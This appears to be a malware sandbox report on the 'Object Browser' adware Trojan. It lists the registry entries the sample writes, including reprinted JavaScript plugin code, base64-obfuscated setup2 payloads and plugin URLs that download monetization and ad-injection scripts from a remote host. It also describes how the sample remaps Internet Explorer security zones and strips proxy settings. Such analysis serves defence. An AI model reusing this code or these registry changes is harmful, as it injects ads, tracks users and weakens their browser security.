    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,123,180,184,191,211,223,242,244,260,91"

    [HKCU\Software\Object Browser\Manifest]
    "PluginsManifestVersion" = "161"
    "PublisherId" = "20891"

    [HKCU\Software\Object Browser\Plugins\35]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\Object Browser\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi\3"

    [HKCU\Software\Crossrider]
    "Bic" = "7F1D95218D1E4CF487AAD4B2A3E48467IE"

    [HKCU\Software\Object Browser\Installer]
    "subid" = "0"

    [HKCU\Software\Object Browser\Plugins\91]
    "Version" = "47"

    [HKCU\Software\Object Browser\Plugins\22]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

    [HKCU\Software\Object Browser\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,104,123,180,184,191,211,217,223,242,244,260,177,91,28"

    [HKCU\Software\Object Browser\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url"

    [HKCU\Software\Object Browser\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\43]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\Object Browser\Plugins\123]
    "Name" = "intext_adv_m"

    [HKCU\Software\Object Browser\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Object Browser\Plugins\17]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

    [HKCU\Software\Object Browser\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Object Browser\Installer]
    "osName" = "XP32"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Object Browser\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\Object Browser\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve"

    [HKCU\Software\Object Browser\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Object Browser\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY3MzUxNDU0NTU4NTEwMTFlMDAxZDJjMDMwOTQ3NDI1MzRiMDIwMDE5MDk0YjRhNGExMTVkMGExODEwMWYxMzAyNGIwYzE2MTUwNjQ1MTcxZjFkMDM0YTBmMTkwNTA4MTkxNzFmMTAwMTExNGIxMjAwNTYwOTFjMGMxNzFmMDAwOTQ1MTAxYjBlMDYzMjI2MmUyNjM3MzcyMDNhMzgzZDI5M2MyMzNhMzYyZDMxMzYyMzMwMzIyNjU3MDQxNTA4MjcwMDFlMTgwODQ0MmUzYTI2MmEzYzNhMzkyNjI0M2QzNDM3M2EzOTIzMzkzNTNhMmMzNDM0M2EzYTVlMWIwMDBlNDkzMjI2MzIzNzJhMmIyMDNiMjMzMDI4MmIyZTMwMzYzZDIxMzYyMzMwMzIyNjUzNDk2ZjU4NTM0OTRhNTYwNTBkMDUxNTE2MmQwMTA1NDg0ZTRkNWIxOTExMTEwODAwNTM0NTViMDQyNjEyMTcwMTBhMTkxYTM1MWQwMzFmMWU0YjExMTQwMDBhMGUxYTQzMWExZTA4NGExYjAxMGQxODViMDcxODA3MDQxNjFiMDEwMDFhMDA0MzEzMDI1YTA2MTAxMjA3MDQxMTAxNDQxMjE3MDEwYTJjMzYzNTM3M2YzNjIyMzYzNzMxMzcyYzM4MmIzZTJjMzMzYTJjM2MyYzM2NGMxNTFkMDkyNTBjMTExNDE2NTQzNTJiMmUyYjNlMzYzNjJhM2EyZDJmMjYzMjM4MjEzNTNhMzYzMjI0MmYyYjMyNWYxOTBjMDE0NTJjMzYyOTI2MjIyYTIyMzcyYzNjMzYzYjM1MjEzZTNjMjMzYTJjM2MyYzM2NDg1ODY3NTk1MTQ1NDU1YTAzMDUxZjEzMDQxNzM4MDE0NzQyNTM1ODVhNDY0MTczNTE0NTQ1NTg1MTFmMGYwNjE5MTAxMjA0MDk1YTQ5NDkzMTU2MWUxMTFlMTUxNTExMWQD"

    [HKCU\Software\Object Browser\Plugins\191]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ciuvo_m.js"

    [HKCU\Software\Object Browser\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Object Browser\Update]
    "LastCheck" = "1401908112"

    [HKCU\Software\Object Browser\Plugins\211]
    "Version" = "5"

    [HKCU\Software\Object Browser\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Object Browser\Plugins\2]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Object Browser\Plugins\123]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\Object Browser\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\Object Browser\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Object Browser\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Object Browser\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Object Browser]
    "ActiveAppId" = "32850"

    [HKCU\Software\Object Browser\Plugins\211]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKCU\Software\Object Browser\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Object Browser\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Object Browser\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiD"

    [HKCU\Software\Object Browser\Plugins\1]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

    [HKCU\Software\Object Browser\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-N3"

    [HKCU\Software\Object Browser\Plugins\42]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\Object Browser\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Object Browser\Plugins\17]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Object Browser\Plugins\47]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

    [HKCU\Software\Object Browser\Plugins\4]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\Object Browser\Plugins\183]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\Object Browser\Installer]
    "CodeDownloadDomain" = "http://js.clientstatsservice.com"

    [HKCU\Software\Object Browser\Plugins\28]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

    [HKCU\Software\Object Browser\Plugins\184]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\Object Browser\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\Object Browser\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\Object Browser\Plugins\102]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKCU\Software\Object Browser\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\Object Browser\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appAp3"

    [HKCU\Software\Object Browser\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;e6"

    [HKCU\Software\Object Browser\Plugins\21]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Object Browser\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\Object Browser\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\Object Browser\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\78]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\Object Browser\Plugins\93]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\Object Browser\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Object Browser\Plugins\17]
    "Name" = "jQuery"

    [HKLM\SOFTWARE\Object Browser\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Object Browser\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\Object Browser\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\Object Browser\Plugins\260]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGE2MjYzNDEwYzAxMDQwNTI3MGIxZDRhNTA0MzQ2MWQwNDAxMDI0MzVlNDcxZDEwNGEwNTAyMWMxMTFjMTUwZDFlMDYwNzAxNWUxNjFkMTQ1ZTFiNDUxMzAwMWYwMzQwNDE0ZjQzNTkwYjUzNTI0NDQ3MTE0MTFkNWYwMjE5NWMxNzFjMTQ0ODJkMjYzMjNhMjUzMDM3MjczOTMxMzcyYjJlM2IzZjIxM2IzYzM0MmEyZDViNWQ2MjYzNDEwYzAxMDQwNTAxMmMwMzA0NDg1OTQ0NTcxODAxMDYwOTAyNTI0NTRjMTMwNjVlMDUwMDEwMTIwZDBlMDYxMDEwMTMwMTVjMWExZTA1NDUxMDRiMDUxNDFmMDE0YzQyNWU1ODUyMDU0NTQ2NDQ0NTFkNDIwYzQ0MDkxNzRhMDMxYzE2NDQyZTM3MjkzMTJiMjYyMzI3M2IzZDM0M2EzNTMwMzEzNzJmM2MzNjI2MmU0YTQ2Njk2ZDU3MDAxOTA3MWUxODA2MjMwNzQ2NGY1MDQ3NDQ0OTdiMTU=', 'qhjcdupury'); }"

    [HKCU\Software\Object Browser\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\Object Browser\Plugins\45]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\Object Browser\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"

    [HKCU\Software\Object Browser\Installer]
    "Time" = "1401908094"

    [HKCU\Software\Object Browser\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Object Browser\Plugins\223]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

    [HKCU\Software\Object Browser\Plugins\191]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\91]
    "JavaScript" = "(function(i){var l=05-20;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstatsservice.com/monetization_campaigns/,statsHostUrl:http://logs.clientstatsservice.com/monetization.gif?,errorHostUrl:http://errors.clientstatsservice.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAMD"
    "Name" = "monetizationLoader.js"

    [HKCU\Software\Object Browser\Plugins\35]
    "Version" = "4"
    "Name" = "IEAjax"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Object Browser\Plugins\45]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\39]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\Object Browser\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn_6"

    [HKCU\Software\Object Browser\Plugins\14]
    "Name" = "CrossriderUtils"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process Object Browser-codedownloader.exe:2148 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Object Browser\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2MDYyNDgwNTEyMWUwOTJjMTkxYjQ4NTE0YTRmMGUxZTBkMDk1MTU4NDUwODBlMDM0ODFjMTAwYTBhMTMwZTQ1MDkwMjBiNDUwYTFhMTkxZTFhMWY0NTVjNTI1ZjRmNGU1YzQ1NWY1YzVjNTg0OTFhMGIxYzA3MTgwYjBmNDQwNzE1NTUwYTBjMDkxZTBlNTYzNTMyMjUzODM2MmEzODI1MjMyZjJmM2YzOTM5MmMzYjM0M2UyZTM0MzU0ZjRhNjA3MDViMWIxYjFmMGMwMzAzMmYwZTViNDM0YjQ1NTg1ODQ2Njc0NjRhNTk1OTQ5MDEwZjE5MWUwNDA1MGIxNTViNTE1NzMxNDkxOTA1MDkxYTA5MTAwNTEwNDgzNjYwMTA=', 'wjkjmfjyyk'); }"

    [HKCU\Software\Object Browser\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\217]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[217]=function(){var a=(function(f){String.prototype.replaceAll=function(i,h){return this.split(i).join(h);};var e=f(window);f.fn.visible=function(h,C,H){if(this.length<1){return;}var D=this.length>1?this.eq(0):this,v=D.get(0),w=e.width(),l=e.height(),H=(H)?H:both,m=C===true?v.offsetWidth*v.offsetHeight:true;if(typeof v.getBoundingClientRect===function){var q=v.getBoundingClientRect(),J=q.top>=0&&q.top0&&q.bottom<=l,E=q.left>=0&&q.left0&&q.right<=w,i=h?J||o:J&&o,y=h?E||E:E&&z;if(H===both){return m&&i&&y;}else{if(H===vertical){return m&&i;}else{if(H===horizontal){return m&&y;}}}}else{var x=e.scrollTop(),r=x l,G=e.scrollLeft(),I=G w,n=D.offset(),A=n.top,B=A D.height(),F=n.left,u=F D.width(),j=h===true?B:A,k=h===true?A:B,s=h===true?u:F,p=h===true?F:u;if(H===both){return !!m&&(H"

    [HKCU\Software\Object Browser\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Object Browser\Plugins\36]
    "Name" = "IEBackground"

    [HKCU\Software\Object Browser\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Object Browser\Plugins\40]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\Object Browser\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\Object Browser\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Object Browser\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\Object Browser\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\Object Browser\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2YjdlNTIxYzAyMTAxNzNjMDIxYzQzNGQ1MDU2MWUxMDEzMTk0YTVmNGUxZTFlMDcwMjRhMTQwMTFmMDAxMTFlMWUxMzE3MTAwMjQ3MTkxZTA3MTg1ZjFlMDU0YjE0MGUyZjEyMDY1OTFhMDc0OTI1MjEyZjM5M2MyODM2MjQzMTI5MmQyMzU0MTMwMjEyMDUxNDA2NTAzNzMyMmIyZjM0MjgyNDI0MjYzZjI2MzIzZDM1MjIzZTNlMzQ0OTI5M2IyNDNiM2YyMzMyMjUzOTMwMzMzNjM4M2EyNTMyM2UzZTM0MmIyOTQyMjUzYjMxM2UyNTI4MzQzZDI1MzQyYjI4MjkyZjJmMzYzZDMxNGIzYjM4MmEyMjNmMzIyNDIyM2QzMjIxMzUzNjMxMjAzMTI4M2UzNTNiMjEzODM2NTI1YzZiN2U1MjFjMDIxMDE3MWEyNTAyMGQ1NTRhNTQ1NDBjMTMxZDAwMDM1YjU4NWYxZDE4MTcxMzQ3MDMxODBlMDcwMDFkMTgwMzA2MWQxNTVlMDgxOTE2MWI1OTBlMTQ0NjAzMTczZTE1MTc1YTFjMTc1ODI4MzYzNjI4M2IzOTM1MjIyMTM4MjAzNDRkMDIwNTAzMDYxMjE2NDEzYTI1MzIzZTMzMzkyNzIyMzYyZTJiMjUyNDI0MjUyZjNkMzI1OTM4MzYzMzIyMmUyNDIzMjYzZjIwMjIzYjJmMjMzNDM1MmYzZDMyM2IzODRmMzIyMjIwMzkzNDJiMzIyZDM0MzkzYzMxMzgyODNlMzUzYjIxNWEzNjJmMzMzMzM4MjMyNzI0MmQyMzJjMjIyZjIwMjcyMDJiMzgyNTJhMmMyZjJmNDM1YjdhN2Q1NDE0MGIxYzE3MTkwZjNlMTQ1NjRjNDQ1NTVkNDI1YzZiNTc1MDU0NTY0NjExMGMwMjA0MDgxNDExMTg1NDVlNDczMjUyMDMwOTE4MDAwNDFmMGEH"

    [HKCU\Software\Object Browser\Plugins\184]
